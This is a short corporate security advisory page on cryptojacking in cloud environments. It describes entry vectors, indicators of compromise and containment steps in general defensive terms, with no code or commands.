Cecure Intelligence Limited

CIL Support

CIL ADVISORY

Cryptojacking in Cloud Environments

  • AUGUST 13TH, 2025
  • 2min read
Cryptojacking in Cloud Environments

Introduction

Cryptojacking is the unauthorised commandeering of your cloud resources. Adversaries hijack cloud compute (VMs, containers, serverless, GPUs) through leaked keys, exposed services, or malicious images, then rapidly spin up instances across regions, tamper with logs to evade detection, and plant persistence (cron/systemd/startup hooks), driving unpredictable costs, degrading performance, and indicating broader control of the account.

Common Entry Vectors

  • Leaked/Hardcoded Credentials: Keys in code, CI/CD logs, public repos.

  • Exposed Services: Open Docker/Kube APIs, SSH/RDP, weak IMDS settings.

  • Unpatched Apps & Images: CVE exploits, malicious base images.

  • Over-Permissive IAM: Broad roles enabling unfettered instance or pod creation.

How to Identify

  • Metrics: Sustained high CPU/GPU; sudden ASG scale-outs; abnormal spot usage.

  • Network: Outbound to mining pools, DNS to known pools.

  • Host/Container: Unknown binaries, cron jobs, systemd timers.

  • Cloud Logs/Findings: Unusual region provisioning, disabled logging/EDR; crypto-mining alerts from cloud security tools.

Immediate Response (Contain & Eradicate)

  • Isolate & Snapshot: Quarantine instances/pods, capture images for forensics.

  • Block Egress: Temporarily block pool domains/IPs, restrict internet egress.

  • Rotate Secrets: Revoke access keys, tokens, kubeconfigs; invalidate session tokens.

  • Remove Persistence: Kill processes, delete cron/systemd tasks and deploy from trusted images.

  • Patch & Review: Fix exploited services; check lateral movement and cloud activity.

  • Secrets Hygiene: Use short-lived creds, IAM roles/managed identities, secret managers; eliminate hardcoded keys.

Conclusion

Treat cryptojacking as both cost fraud and security breach. Pair strict identity controls with hardened compute, tight egress, continuous monitoring, and automated containment.

Explore more CIL Advisories

Review Bombing Attacks and Extortion

Review Bombing Attacks and Extortion

IntroductionMalicious actors use "review-bombing", a coordinated flood of fake, one-star reviews as an initial step for extortion. This high volume…

NOVEMBER 26TH, 2025

Read More
Synthetic Phishing: AI-Enabled Insider Impersonation

Synthetic Phishing: AI-Enabled Insider Impersonation

IntroductionThreat actors increasingly use artificial intelligence (AI) to impersonate trusted individuals such as executives, employees, or suppliers within organisations. These…

NOVEMBER 24TH, 2025

Read More
The Silent Security Threat: Data Hoarding

The Silent Security Threat: Data Hoarding

IntroductionThe greatest risk to your organization may be the sheer volume of data we hold, a practice known as Data…

NOVEMBER 19TH, 2025

Read More

Never miss a CIL Security Advisory

Stay informed with the latest security updates and insights from CIL.

Cryptojacking in Cloud Environments

Contact Us

Message Sent!

Thank you for reaching out. We have received your message and will get back to you shortly.

Check your email for a confirmation from us.

Start a project

Project Request Submitted!

Thank you for your interest. Our team will review your project details and reach out to you soon.

Check your email for a confirmation from us.

We use cookies to enhance your browsing experience, serve personalized ads or content, and analyze our traffic. By clicking "Accept All", you consent to our use of cookies. You can manage your preferences or learn more in our Cookie Policy .

Cookie Settings

We use cookies to improve your experience on our website. Some cookies are essential for the website to function, while others help us understand how you interact with our site. You can choose which cookies to accept below.